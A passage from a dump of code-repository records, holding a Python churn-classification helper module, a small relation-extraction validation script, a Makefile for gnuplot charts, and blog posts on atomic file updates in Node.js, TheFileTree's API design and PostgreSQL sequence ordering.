_best_feats(self):\n features = [ (self.X_train.columns[idx], round(val, 4))\n for idx, val in enumerate(self.xgb_model.feature_importances_)\n if val != 0 ]\n best = sorted(features, key=lambda x:x[1], reverse=True)[:10]\n return best\n \n def plot_bf(self):\n '''\n Bar Plot of top 10 features in XGBoost\n '''\n best = pd.DataFrame(self._best_feats(), columns=['Features', 'Importance'])\n f, ax = plt.subplots(figsize = (25,5))\n sns.barplot(x='Features', y='Importance', data=best)\n plt.show()\n\n def get_rf(self, gs=False, params=None):\n '''\n Instantiate and fit RandomForest model object with or without GridSearch to train set\n Default model as .rf_model and GridSearch model as .gs_rf\n Parameters\n ----------\n gs : bool\n True = RandomForest with GridSearch CV\n False (default) = default RandomForest\n params : dictionary\n parameters to run through GridSearch CV\n '''\n if gs == True:\n self.rf_model = RandomForestClassifier()\n self.gs_rf = GridSearchCV(\n estimator=self.rf_model,\n param_grid=params,\n scoring='f1',\n n_jobs=-1,\n verbose=1,\n cv=5)\n self.gs_rf.fit(self.X_train, self.y_train)\n\n preds = self.gs_rf.best_estimator_.predict(self.X_test)\n\n test_f1 = f1_score(self.y_test, preds)\n test_acc = accuracy_score(self.y_test, preds)\n\n print(\"Accuracy: %f\" % (test_acc))\n print(\"F1: %f\" % (test_f1))\n print('Best Parameters:\\n{}'.format(self.gs_rf.best_params_))\n\n else:\n self.rf_model = RandomForestClassifier().fit(self.X_train, self.y_train)\n self.rf_model.fit(self.X_train, self.y_train)\n\n preds = self.rf_model.predict(self.X_test)\n\n test_f1 = f1_score(self.y_test, preds)\n test_acc = accuracy_score(self.y_test, preds)\n\n print(\"Accuracy: %f\" % (test_acc))\n print(\"F1: %f\" % (test_f1))\n\n# Functions for EDA and Feature Engineering\n\ndef multi_plot(df, plot='hist', target=''):\n '''\n Plotting continuous features for EDA\n Parameters\n ----------\n df : DataFrame\n type : str\n 'hist' as histogram or 'lmplot' as lmplot\n target : str\n target variable\n '''\n for col in df.columns:\n if df[col].dtype == 'float64' or df[col].dtype == 'int64':\n if plot == 'hist':\n df.hist(col)\n plt.show()\n elif plot == 'lmplot':\n sns.lmplot(x=col, y=target, data=df, logistic=True)\n plt.show()\n\ndef colin_plt(df, 
target='', context='poster', figsize=(20,10), ft_scale=0.7):\n    sns.set(rc = {'figure.figsize':figsize})\n    sns.set_context(context, font_scale=ft_scale)\n    sns.heatmap(df.drop(target, axis=1).corr(), cmap='Reds', annot=True)\n    plt.show()\n\ndef chi_sq(df, feature='', target='', bin_point=0):\n    '''\n    Chi-Squared test for single feature, uses alpha = 0.05 and ddof = 1\n    Parameters\n    ----------\n    feature : str\n        feature column to inspect as str\n    target : str\n        target variable\n    bin_point : int or float, default = 0\n        the equal or less than point where to bin as int or float\n    '''\n    def _bin_bin(df):\n        el_bin_t = len(df.loc[(df[feature] <= bin_point) & (df[target] == True)])\n        el_bin_f = len(df.loc[(df[feature] <= bin_point) & (df[target] == False)])\n        g_bin_t = len(df.loc[(df[feature] > bin_point) & (df[target] == True)])\n        g_bin_f = len(df.loc[(df[feature] > bin_point) & (df[target] == False)])\n        return el_bin_t, el_bin_f, g_bin_t, g_bin_f\n    \n    el_t, el_f, g_t, g_f = _bin_bin(df)\n\n    tot_t = el_t + g_t\n    tot_f = el_f + g_f\n    tot_el = el_t + el_f\n    tot_g = g_t + g_f\n\n    ex_elt = tot_el * tot_t/(tot_t+tot_f)\n    ex_elf = tot_el * tot_f/(tot_t+tot_f)\n    ex_gt = tot_g * tot_t/(tot_t+tot_f)\n    ex_gf = tot_g * tot_f/(tot_t+tot_f)\n\n    chi, p = stats.chisquare([el_t, el_f, g_t, g_f], [ex_elt, ex_elf, ex_gt, ex_gf], ddof=1)\n    if chi > 3.8415:\n        print('Reject Null Hypothesis')\n    else:\n        print('Cannot Reject Null Hypothesis')\n    print('Chi-Squared: {}'.format(chi))\n    print('p-value: {}'.format(p))
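\n\nif __name__ == '__main__':\n    # Illustrative smoke test on a tiny fabricated dataset (an addition for\n    # demonstration; not the project data)\n    demo = pd.DataFrame({'calls': [0, 1, 0, 5, 6, 7],\n                         'churn': [False, False, False, True, True, True]})\n    chi_sq(demo, feature='calls', target='churn', bin_point=1)"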
}
] | 2 |
Minn-Yxm/bert_in_keras | https://github.com/Minn-Yxm/bert_in_keras | 05532075cecc07ad11620d2154b9e550d627b382 | 2443ca91ad1d078bd8c10f5e5e602b4d410030a8 | 37cac73643aa57cb55c9739c3d7ab3754239801c | refs/heads/master | 2020-12-03T11:07:19.687820 | 2020-01-06T12:25:35 | 2020-01-06T12:25:35 | 231,293,142 | 0 | 0 | null | 2020-01-02T02:28:55 | 2020-01-01T06:52:19 | 2019-10-24T03:41:03 | null | [
{
"alpha_fraction": 0.7435897588729858,
"alphanum_fraction": 0.7435897588729858,
"avg_line_length": 18.625,
"blob_id": "d7bae86dd061864bd661828dfedf3e5f11729ef1",
"content_id": "1c354a10d945e83491f92390b67af9311bc36e89",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 156,
"license_type": "no_license",
"max_line_length": 52,
"num_lines": 8,
"path": "/val.py",
"repo_name": "Minn-Yxm/bert_in_keras",
"src_encoding": "UTF-8",
"text": "import json\nimport relation_extract\n\ntest_data=[]\nf = json.load(open('../datasets/test_data_me.json'))\ntest_data.extend(f)\n\nrelation_extract.test(test_data)"
}
] | 1 |
espadrine/espadrine.github.com | https://github.com/espadrine/espadrine.github.com | 2d45042f60c16481ceeb527ddbdf61d75f880323 | 1bb53b2f9b4124d78192a005aa06fa2a94c2fd96 | 52016dee706b9ac4df7d065129c44ab862e435d9 | refs/heads/master | 2023-08-11T10:10:03.579248 | 2023-07-24T22:54:59 | 2023-07-24T22:54:59 | 2,561,955 | 2 | 1 | null | 2011-10-12T11:41:31 | 2019-05-10T08:13:37 | 2019-05-10T08:54:39 | HTML | [
{
"alpha_fraction": 0.692108690738678,
"alphanum_fraction": 0.7736093401908875,
"avg_line_length": 50.53333282470703,
"blob_id": "a82d9cb30b53165f7383996a7b9dbccfd99aa91f",
"content_id": "e12e9262ce8ca16f1b66d5b79d8235a3b92ca77d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 773,
"license_type": "no_license",
"max_line_length": 127,
"num_lines": 15,
"path": "/blog/assets/chinchilla-s-death/Makefile",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "LLAMA1_DATA_PIXELS = data/llama1-7B-pixels.tsv data/llama1-13B-pixels.tsv data/llama1-33B-pixels.tsv data/llama1-65B-pixels.tsv\nLLAMA1_DATA = data/llama1-7B.tsv data/llama1-13B.tsv data/llama1-33B.tsv data/llama1-65B.tsv\nLLAMA2_DATA_PIXELS = data/llama2-7B-pixels.tsv data/llama2-13B-pixels.tsv data/llama2-34B-pixels.tsv data/llama2-70B-pixels.tsv\nLLAMA2_DATA = data/llama2-7B.tsv data/llama2-13B.tsv data/llama2-34B.tsv data/llama2-70B.tsv\n\nall: llama1-training-speed.svg llama2-training-speed.svg\n\nllama1-training-speed.svg: llama1.plot $(LLAMA1_DATA)\n\tgnuplot llama1.plot >$@\n\nllama2-training-speed.svg: llama2.plot $(LLAMA2_DATA)\n\tgnuplot llama2.plot >$@\n\n$(LLAMA1_DATA) $(LLAMA2_DATA): llama-data.py $(LLAMA1_DATA_PIXELS) $(LLAMA2_DATA_PIXELS)\n\tpython3 llama-data.py\n"
},
{
"alpha_fraction": 0.7485818862915039,
"alphanum_fraction": 0.7572677731513977,
"avg_line_length": 46.80791091918945,
"blob_id": "5d77e3653c4455b6a2ff503b4008e642348e3ec1",
"content_id": "57b6ead8dd186d06e2ad3110a35762e1d06f5072",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 16975,
"license_type": "no_license",
"max_line_length": 338,
"num_lines": 354,
"path": "/blog/src/file-system-object-storage.md",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "# Insanities of a File System Object Storage\n\n*(TL;DR: I present [fsos][]; but read on to know why.)*\n\nHow do you update a file in Node.js?\n\nWell, let's browse our dear [file system API][]…\n\n[file system API]: https://nodejs.org/api/fs.html\n\n```js\nfs.writeFile(file, data)\n```\n\nSimple enough, isn't it?\n\nAnd yet, there are so many kinds of wrong in this seemingly obvious answer.\n\n## POSIX\n\nLet's first educate ourselves. Node.js' file system API is designed to imitate\nand target POSIX, a specification to etch the core Unix experience in granite.\nWhile the main reason for the success of Unix was portability, ensuring that\nuserland programs could run on different machines, the three tenets of its\ndesign were also delicious (**plain text** as universal interface, composable\nprograms via a **shell**, and a **hierarchical file system** offering a unified\ninterface to kernel functionality (not just data storage)).\n\nNaturally, everybody stole those juicy ideas. When Richard Stallman famously\nchose to write a free operating system to oppose what we would today call DRM,\nhe wanted Unix compatibility. When compatibility is seeked, standardization\nbecomes necessary. IEEE sprung into action in the form of SUS (the Single Unix\nSpecification), and, with Richard's suggested name, wrote the Portable Operating\nSystem Interface, **POSIX**.\n\nRichard's baby, **GNU**, had little impact without a proper kernel. It was a\nmere collection of programs that would talk to a Unix file system if there was a\nfree one. Fortunately, a free one arose, birthed as **Linux**, and gained major\nadoption thanks to its sweet mix of speed, stability, and a healthy dose of\nbright experiments. When **Node.js** was created, Linux was the overwhelming\nking of the server-side, which Node.js wanted to conquer.\n\nIn a way, the reason that the obvious one-liner above doesn't work is Unix'\nfault. It designed file interaction in a manner that made a lot of sense for\nsome uses of the file system, disregarding others. Behind the covers, each\nfile is a mere set of contiguous disk space (blocks, extents, or sectors) that\npoint to each other, so it stands to reason that appending data at the end is\nprobably faster than appending it at the beginning, just as it is with a diary.\n\nThe standard C library defined by POSIX reflects the internal design of Unix\nfile systems without hiding its flaws. Consequence: internally non-obvious\noperations have non-obvious solutions, and non-solutions that are as tempting to\nuse as a chocolate cookie (up until your tongue warns you that it was in fact\nraisins).\n\nThe most critical interface for file operations is [open][]. It returns a file\ndescriptor to operate the file. It takes a handful of required flags and a ton\nof optional ones. Most famous amongst the required ones are `O_RDONLY` if you\nwill only read, `O_WRONLY` if you don't feel like reading anymore, and `O_RDWR`\nif you hate picking a side.\n\nAmong the optional flags, `O_CREAT` creates the file automatically if it doesn't\nexist, `O_TRUNC` empties the file, and `O_APPEND` forces you to write only at\nthe end. (What a coincidence that appending is both fast in file systems and\nhas a shortcut!)\n\nHowever, most people use [fopen][], a layer on top of [open][], which\nunfortunately has very strange defaults. Instead of the flags we understand, it\nhas string modes that seem to mean something they do not do. 
Here are the\nnonsensical rules.\n\n- `\"r\"` is the only one that prevents writing,\n- If the string has an `r`, it doesn't create a file automatically,\n- If the string does not have a `+`, it cannot both read and write,\n- If the string has a `w`, it empties the file,\n- If the string has an `a`, all writes append to the file (finally one that\n does what is on the cover!)\n\nFor instance, `\"r+\"` can write, but won't create a file automatically for some\nreason.\n\nThe modes offered by [fopen][] barely target what people actually do with a\nfile:\n\n1. Read a configuration file: `\"r\"`,\n2. Write logs: `\"a\"`,\n3. Update a whole file: nothing.\n\nFor more precise operations, use `\"r+\"`. All other possibilities are most likely\nbugs waiting to be found. Special mention to `\"w+\"` which empties the file it\nallows you to read! In fact, the main lesson of this blog post is that `O_TRUNC`\nhas only one, very rare, use-case: *emptying a file, without removing it,\nwithout writing to it*. You should essentially never use `\"w\"`.\n\nNaturally, Node.js favours [fopen][]-style modes, instead of the more elegant\n[open][].\n\nNaturally, its default mode for write operations is the useless `\"w\"`.\n\n[open]: http://pubs.opengroup.org/onlinepubs/9699919799/functions/open.html\n[fopen]: http://pubs.opengroup.org/onlinepubs/9699919799/functions/fopen.html\n\n## Async IO\n\nNow that we have background information, let's dig into the first issue.\n\nA long-standing problem in HTTP server software is [C10K][], ie. hitting 10k\nconcurrent clients to serve with a single machine. A large part of beating that\nfigure is dealing with how slow IO is. Fetching a file on disk takes a long\ntime! And by default, POSIX system calls make your program wait for the file to\nbe read, and your program just sits there doing nothing in the meantime, like a\npassenger waiting for the bus to come.\n\n[C10K]: http://www.kegel.com/c10k.html\n\nFortunately, POSIX includes a special switch to avoid waiting: `O_NONBLOCK`. It\nis part of [open][]. When an IO operation is performed, you can do whatever you\nwant, even though the operation is not done. Later on, you can call `poll()` or\n`select()` or `kqueue()` (depending on the OS you use), and learn whether the\noperation is done.\n\nNode.js' *raison d'être* was completely focused on how easy JS makes\nasynchronous operations. Their whole file system interface recommends using the\nnon-blocking API. But in some cases, it makes zero sense. So it is with\n`fs.writeFile()`. It *never* does what you want. Not with the default\nparameters, anyway.\n\nWhen you use storage, you implicitly expect some level of consistency. If you\nwrite 'hello' to a file which contains 'hi' and then immediately read from it,\nyou don't expect to read 'who is this?' if absolutely nobody wrote to the file\nin the meantime. You expect 'hello' — or, at least, 'hi'. But here, you will\nread neither what was in the file before, nor what you wrote in it.\n\n```js\nvar fs = require('fs')\nvar fn = './foo' // file name\nfs.writeFileSync(fn, '1234\\n')\nfs.createReadStream(fn).pipe(process.stdout) // → 1234\nfs.writeFile(fn, '2345\\n')\nfs.createReadStream(fn).pipe(process.stdout) // The file is empty.\n```\n\nThis is the code I submitted as [an issue][old issue] to Joyent's node (prior to\nthe io.js fork).\n\n[old issue]: https://github.com/nodejs/node-v0.x-archive/issues/7807\n\nSo what is going on? 
Why does it break your implicit consistency expectations?\nIt turns out that the operations you use are not atomic. What `fs.writeFile()`\nreally means is “Empty the file immediately, and some day, please fill it with\nthis.” In POSIX terms, you perform an\n`open(…, O_WRONLY|O_CREAT|O_TRUNC|O_NONBLOCK)`, and the `O_TRUNC` empties the\nfile. Since it is `O_NONBLOCK`, the next line of code gets executed immediately.\nThen, Node.js' event loop spins: on the next tick, it polls, and the file system\ntells it that it is done (and indeed, it is). Note that it can take many more\nevent loop ticks, if there is a larger amount of data written.\n\nFundamentally, why would you ever want those default flags (aka. `fopen`'s\n`'w'`)? If you are writing logs or uploading a file to the server, you want\n`'a'` instead; if you are updating configuration files or any type of data, you\nwant… something that will be described in the next chapter. For any type of file\nthat has the risk of being read, this default flag is the wrong one to use.\n\nSo, the problem is that it was non-blocking, right? After all, if we change it\nto be synchronous, it all seems to work, right?\n\n```js\nvar fs = require('fs')\nvar fn = './foo' // file name\nfs.writeFileSync(fn, '1234\\n')\nfs.createReadStream(fn).pipe(process.stdout) // → 1234\nfs.writeFileSync(fn, '2345\\n')\nfs.createReadStream(fn).pipe(process.stdout) // → 2345\n```\n\nDon't you hate it when you read a blog post, and the author ends two\nconsecutive sentences with “right?”, and you just know it means “false!”\n\n## File Systems\n\nWhat if your application crashes?\n\nHaving your app crash just after you opened the file for writing, but before it\nis done writing, will unsurprisingly result in a half-written file — or an empty\none. Since the memory of the crashed app is reclaimed, the data that was not\nwritten is lost forever!\n\nYou want to *replace a file*. Therefore, even if the application crashes, you\nwant to make sure that you maintain either the old version, or the new version,\nbut not an in-between. `fs.writeFileSync()` does not offer that guarantee, just\nas the underlying POSIX primitives. It is tempting, but wrong.\n\nIn [the words][Ts'o comment] of Theodore Ts'o, maintainer of ext4, the most used\nfile system on Linux and possibly in the world (and creator of `/dev/random`):\n\n> Unfortunately, there very many application programmers that attempt to update an existing file’s contents by opening it with O_TRUNC. I have argued that those application programs are broken, but the problem is that the application programmers are “aggressively ignorant”, and they outnumber those of us who are file system programmers.\n\n[Ts'o comment]: http://thunk.org/tytso/blog/2009/03/12/delayed-allocation-and-the-zero-length-file-problem/comment-page-5/#comment-2782\n\nThe fundamental issue is that `fs.writeFileSync()` is not atomic. It is a series\nof operations, the first of which deletes the old version of the file, the next\nones slowly inserting the new version.\n\nWhat do we want? The new version! When do we want it? Once written on disk,\nobviously. We have to first write the new version on disk, alongside the old\none, and then switch them. Fortunately, POSIX offers a primitive that performs\nthat switch *atomically*. 
World, meet [`rename()`][rename].\n\n[rename]: http://pubs.opengroup.org/onlinepubs/9699919799/functions/rename.html\n\n```js\nvar tmpId = 0\nvar tmpName = () => String(tmpId++)\nvar replaceFile = (file, data, cb) => {\n var tmp = tmpName()\n fs.writeFile(tmp, data, err => {\n if (err != null) { cb(err); return }\n fs.rename(tmp, file, cb)\n })\n}\n```\n\nObviously, I simplify a few things in this implementation:\n\n- We have to verify that the `tmp` file does not exist,\n- We should make `tmp` have a UUID to reduce the risk that another process\n creates a file with the same name between the moment we check for its\n existence and the moment we write to it,\n- We said before that Node.js was using `'w'` as the default write flag; we want\n to use at least `'wx'` instead. `x` is a Node.js invention that uses `O_EXCL`\n instead of `O_TRUNC`, so that the operation fails if the file already exists\n (we would then retry with a different UUID),\n- We need to create `tmp` with the same permissions as `file`, so we also need\n to `fs.stat()` it first.\n\nAll in all, the finished implementation is nontrival. But this is it, right?\nThis is the end of our ordeal, right? We finally maintained consistency, right?\n\nI have good news! According to POSIX, yes, this is the best we can do!\n\n## Kernel Panics\n\nWe settled that *write temporary then rename* survives app crashes under\nPOSIX. However, there is no guarantee for system crashes! In fact, POSIX gives\nabsolutely no way to maintain consistency across system crashes with certainty!\n\nDid you really think that being correct according to POSIX was enough?\n\nWhen Linux used ext2 or ext3, app developers used *truncate then write* or the\nslightly better *write temporary then rename*, and everything seemed fine,\nbecause system crashes are rare. Then a combination of three things happened:\n\n- Unlike ext3, ext4 was developed with **delayed allocation**: writes are\nperformed in RAM, then it waits for a few seconds, and only then does it apply\nthe changes to disk. It is great for performance when apps write too often.\n- GPU vendors started writing drivers for Linux. Either they didn't care much\nabout their Linux userbase, or all their drivers are faulty: the case remains\nthat **those drivers crashed a lot**. And yet, the drivers are part of the\nkernel: they cause system crashes, not recoverable application crashes.\n- **Desktop Linux** users started playing games.\n\nWhat had to happen, happened: a user played a game that crashed the system, at\nwhich point all files that had been updated in the past 5 seconds were zeroed\nout. Upon reboot, the user had lost a lot of data.\n\nThere were a lot of sad Linux users and grinding of teeth. As a result, Theodore\nTs'o [patched][delayed allocation] the kernel to detect when apps update files\nthe wrong way (ie, both *truncate then write* and *write temporary then\nrename*), and disabled delayed allocation in those cases.\n\nYes. *Write temporary then rename* is also the wrong way to update a file. I\nknow, it is what I just advised in the previous section! In fact, while POSIX\nhas no way to guarantee consistency for file updates, here is the closest thing\nyou'll get:\n\n1. Read the file's permissions.\n2. Create a temporary file in the same directory, with the same permissions,\nusing `O_WRONLY`, `O_CREAT` and `O_EXCL`.\n3. Write to the new file.\n4. [`fsync()`][fsync] that file.\n5. Rename the file over the file you want to update.\n6. 
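`fsync()` the file's directory.\n\nHere is a sketch of that procedure with the promise-based `fs.promises` API of\nmodern Node.js, reusing the `tmpName()` helper sketched above (note that\nsyncing a directory handle only works on platforms that let you open a\ndirectory, such as Linux):\n\n```js\nconst fsp = require('fs').promises\nconst path = require('path')\n\nconst updateFile = async (file, data) => {\n  const { mode } = await fsp.stat(file)                   // 1. read permissions\n  const tmp = path.join(path.dirname(file), tmpName())\n  const fd = await fsp.open(tmp, 'wx', mode & 0o777)      // 2. O_CREAT|O_EXCL\n  try {\n    await fd.writeFile(data)                              // 3. write the data\n    await fd.sync()                                       // 4. fsync the file\n  } finally { await fd.close() }\n  await fsp.rename(tmp, file)                             // 5. atomic switch\n  const dir = await fsp.open(path.dirname(file), 'r')\n  try { await dir.sync() } finally { await dir.close() }  // 6. fsync the dir\n}\n```\n\n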
[fsync]: http://pubs.opengroup.org/onlinepubs/9699919799/functions/fsync.html\n\nIsn't it [obvious][don't fear the fsync] in retrospect?\n\n[don't fear the fsync]: http://thunk.org/tytso/blog/2009/03/15/dont-fear-the-fsync/\n\n*Renaming the file before it is `fsync`'ed* creates a window of time where a\ncrash would make the directory point to the updated file, which isn't committed\nto disk yet (as it was in the file system cache), and so the file is empty or\ncorrupt.\n\nLess harmful, *a crash after renaming and before the directory's cache is\nwritten to disk* would make it point to the location of the old content. It\ndoesn't break atomicity, but if you only want to perform some action after the\nfile was replaced *for sure*, you would better `fsync` that directory before you\ndo something you will regret. It might seem like nothing, but it can break your\nassumptions of data consistency.\n\nIf you own an acute sense of observation, you noticed that, while Theodore's\npatch makes it less likely that “badly written file updates” will cause files to\nbe zeroed out upon a system crash, the bug always existed and still exists! The\ntimespan where things can go horribly wrong is only reduced. The fault is\nrejected on the app developers.\n\nThis issue was “fixed” — well, the patch landed at least — in Linux 2.6.30 on\nthe most common file systems (ext4 and btrfs).\n\n[delayed allocation]: http://thunk.org/tytso/blog/2009/03/12/delayed-allocation-and-the-zero-length-file-problem/\n\n## Conclusion\n\nHere's one thing to get away from all this: file systems have a design which\nworks well with certain operations and… not so well… with others. **Replacing a\nfile is costly!** You should know what you are doing (or use [fsos][], my npm\nlibrary which wraps all of this in sweet promises), and only replace files at\nworst a few times a second. Ideally a lot less often, especially for large\nfiles.\n\nRealistically, though, what you fundamentally want is not to lose work that is\nolder than X seconds, for some value of X that is thankfully often larger than\na half.\n\nBesides, this is Node.js. One issue that is common elsewhere with a trivial\nimplementation is that the main thread waits for the I/O to be finished before\nit can move on. In Node.js, we get asynchrony for free. The file replacement\nhappens essentially in the background. The main thread stays as responsive as a\nhappy antelope!\n\n[fsos]: https://www.npmjs.com/package/fsos\n\nPS: I feel like I should also advocate for a few things. For every mistake,\nthere is both a lesson and a prevention; we have only just learned the lesson.\nProgrammers go to the path of least resistance, and what they face encourages\nthem to the pit of death. I see two splinters to remove:\n\n1. Linux should offer an atomic file replacement operation that does it all\nright. Theodore argues that it is glib's (and other libraries') task, but I\ndisagree. To me, one of the most common file operations doesn't have its\nsyscall.\n2. Node.js' defaults ought to be improved. `fs.writeFile()` heavily suggests\nbeing used for file updates, and has the default flag of `'w'`. It is a terribly\nill-advised primitive for any use. It should be replaced by `'ax'`, but it\ncannot, because of legacy! 
I recommend having a warning, and a separate\n`fs.updateFile()` function.\n\n<script type=\"application/ld+json\">\n{ \"@context\": \"http://schema.org\",\n \"@type\": \"BlogPosting\",\n \"datePublished\": \"2018-05-31T19:42:00Z\",\n \"keywords\": \"storage, posix\" }\n</script>\n"
},
{
"alpha_fraction": 0.7522722482681274,
"alphanum_fraction": 0.7571337819099426,
"avg_line_length": 85.01818084716797,
"blob_id": "9406522b5b32e13599c21c62d8cbe6932f8fee4e",
"content_id": "fb839deaf43307fe8a504f66e5060787cf8da592",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 4745,
"license_type": "no_license",
"max_line_length": 636,
"num_lines": 55,
"path": "/blog/src/thefiletree-design-log-2.md",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "# TheFileTree Design Log 2: API\n\nI have implemented the core API, which powers the folder app.\n\n# API\n\nI tried to stay close to WebDAV, even though I will differ from it in one significant fashion: no file locks.\n\n- `GET /`: loads the file type's app (eg, a text editor, or a file browser).\n- `GET /file?app=data`: downloads file content.\n- `GET /?app=data`: gets a JSON list of the folder's contained file names. A `Depth: 0` HTTP header makes it get a map from file names to `{meta: …}`, which contains its metadata. Further depths also include a `{files: …}` key, which is yet again a map from file names to `{meta: …, [files: …]}`. I rely on the depth for fuzzy matching file names in the file browser.\n- `GET /?app=metadata`: obtains the file's metadata as JSON.\n- `PUT /?app=metadata Content-Type: application/json`: replace the file's metadata.\n- `PUT /foo`: upload a file, creating it if necessary.\n- `POST /?op=append&content=… Content-Type: multipart/form-data`: upload several files, creating them if needed.\n- `MKCOL /`: create a folder.\n- `DELETE /`: remove a file.\n\nI will implement `COPY` and `MOVE` in the future; those operations were not supported in the past.\n\nMetadata information is autosaved every 5 seconds when it changed.\n\nI am afraid this whole reimplementation went faster than planned, leaving me in front of the difficult choice that I hoped to delay…\n\n# Synchronized Editing\n\nI wish to support synchronized editing for text and JSON, with index rebasing to preserve intentions. I see it as a WebSocket JSON stream over `/file?op=edit&app=text`. But what library should I use, and with which protocol? Canop is functional and efficient, although it requires centralization (which will remain unavoidable), but full-JSON is not implemented yet, nor are compound atomic transactions, only text. Meanwhile, jsonsync is functional and mostly relies on the JSON Patch standard (and also peer-to-peer, but this is useless in our case), but index rebasing is not implemented yet, and not as efficient as it is for Canop.\n\n(Given proper index rebasing, there is no reason for which we could not support binary editing. However, if you are modifying a binary file, the synchronization cannot know whether the file gets corrupted, as it does not know its semantics, only its serialized form. For instance, a PNG file edited simultaneously may be synchronized to a state where the index rebasing results in an invalid file. To avoid file corruption, I won't provide binary synchronization.)\n\n# Accounts\n\nOne of the large, long-term changes I wanted to include for a long time was **accounts**. In the former implementation of TheFileTree, everyone was anonymous, which both made it implausibly hard to scale (for instance, having private files necessitated passwords, one for each file, and giving access to a file meant sharing that password, which if the password is used on another file, means remembering a lot of passwords,etc…) and hard to sell (I wouldn't pay a subscription for a service that can't remember that I paid it).\n\nHowever, I am unsure of the exact layout I want for the root folder. 
My initial thoughts:\n\n- app (contains trusted apps, like \"folder\" for file exploration, \"text\" for editing, \"markdown\", \"html\", etc.),\n- lib (shared libraries and assets used by app and the system, like a 404 page),\n- api (fake inaccessible directory; used for actions like api/1/signup; I can probably make it hold manual pages upon GETting),\n- demo (anonymous public access),\n- about (help, manuals, owner information),\n- One of the following:\n - Users are stored at the root (eg. thefiletree.com/espadrine), they cannot use the existing root file names as nick, and that potentially blocks me from creating new root files in the future (unless I reserve all 3-letter alphabetic words). There is no visual clutter though, as you only see folders you can enter.\n - @nick (Twitter syntax, slightly ugly but popular: thefiletree.com/@espadrine). Other options I considered are ~nick (as per httpd, but it just looks ugly, take a look: thefiletree.com/~espadrine), u (storing nicks, for instance thefiletree.com/u/espadrine, the Reddit way; but it encourages calling nicks /u/nick instead of @nick, and it doesn't make it feel like I am treated first-class as a user), usr (but it is 2 chars longer than u), and finally, the comfy unixy home (oh, thefiletree.com/home/espadrine), but it is even longer!.\n- ~ (reserved to allow redirection to user directory, eg. thefiletree.com/~/my/content),\n- favicon.ico,\n- robots.txt,\n- humans.txt.\n\n<script type=\"application/ld+json\">\n{ \"@context\": \"http://schema.org\",\n \"@type\": \"BlogPosting\",\n \"datePublished\": \"2017-01-01T11:05:00Z\",\n \"keywords\": \"tree\" }\n</script>\n"
},
{
"alpha_fraction": 0.6808355450630188,
"alphanum_fraction": 0.6991336941719055,
"avg_line_length": 36.54103469848633,
"blob_id": "9cf87d68e98783ec69250d496ff806eb629a9e14",
"content_id": "1708445b9b72b1173f06a444bdbb694dcdcc3d70",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 12403,
"license_type": "no_license",
"max_line_length": 123,
"num_lines": 329,
"path": "/blog/src/two-postgresql-sequence-misconceptions.md",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "# Two PostgreSQL Sequence Misconceptions\n\n✨ *With Examples!* ✨\n\nSome constructs seem more powerful than the promises they make.\n\nPostgreSQL sequences are like that. Many assume it offers stronger properties\nthan it can deliver.\n\nThey trust them to be the grail of SQL ordering, the one-size-fits-all of strict\nserializability. However, there is a good reason Amazon spent design time on\nvector clocks in [Dynamo][], Google invested significantly into [Chubby][], then\n[Percolator][]’s timestamp oracle, then [Spanner][]’s expensive,\natomic-clock-based TrueTime; why Twitter built [Snowflake][], and so many others\nbuilt custom timestamp systems.\n\n[Dynamo]: https://www.allthingsdistributed.com/files/amazon-dynamo-sosp2007.pdf\n[Chubby]: https://static.googleusercontent.com/media/research.google.com/en//archive/chubby-osdi06.pdf\n[Percolator]: https://storage.googleapis.com/pub-tools-public-publication-data/pdf/36726.pdf\n[Spanner]: https://static.googleusercontent.com/media/research.google.com/en//archive/spanner-osdi2012.pdf\n[Snowflake]: https://developer.twitter.com/en/docs/basics/twitter-ids.html\n\n1. Strict serializability is hard to achieve, especially in a distributed\n system, but even in a centralized system with the possibility of failure.\n2. Developers assume the system is strict-serializable, but it usually is not.\n3. When a system provides timestamps, developers will use those as if they were\n monotonically strictly increasing atomically throughout the distributed\n system, but they often are not, which causes subtle bugs.\n\n## The problem space\n\nTo design your system’s properties right, it is often useful or necessary to\ndetermine the order in which events happened. Ideally, you wish for the **“wall\nclock” order** (looking at your watch), although instantaneity gets tricky when\nevents occur at a distance, even within the same motherboard, but especially\nacross a datacenter, or between cities.\n\nAt the very least, you want to reason about **causal ordering**: when that event\nhappened, did it already see this other event?\n\nA nice property to have, even for a single centralized database, is to give a\nmonotonically increasing identifier for each row. Most PostgreSQL users rely on\nthe `SERIAL` type for that – a sequence. Each insertion will call `nextval()`\nand store an increasing value.\n\nWhat you implicitly want is to list rows by insertion order, Your mental model\nis that each insertion happens at a set “wall clock” time. A first insertion\nwill happen at T0 and set the identifier 1, the next one happens at T1 and get\nnumber 2, and so on. Therefore, _you expect a row with ID N to have causally\nbeen inserted after a row with ID M < N_.\n\nOperational order is a consistency constraint strongly associated with isolation\nlevels. A PostgreSQL database can handle multiple simultaneous operations.\n\n_(Side note: I could be talking about threads and locks, but I will not, because\nthose are just tools to achieve properties. PostgreSQL may switch tools to\nbetter meet a given promise (they did so with the serializable level in 2011),\nbut the promise won’t change.)_\n\nBy default, it promises **Read Committed** isolation: a transaction can witness\nthe effects of all transactions that commit “before” it does (but not those that\nhave not committed yet). Their commits are therefore causally ordered by commit\ntime.\n\nHowever, nothing else within a transaction has any causal promise with respect\nto other transactions. 
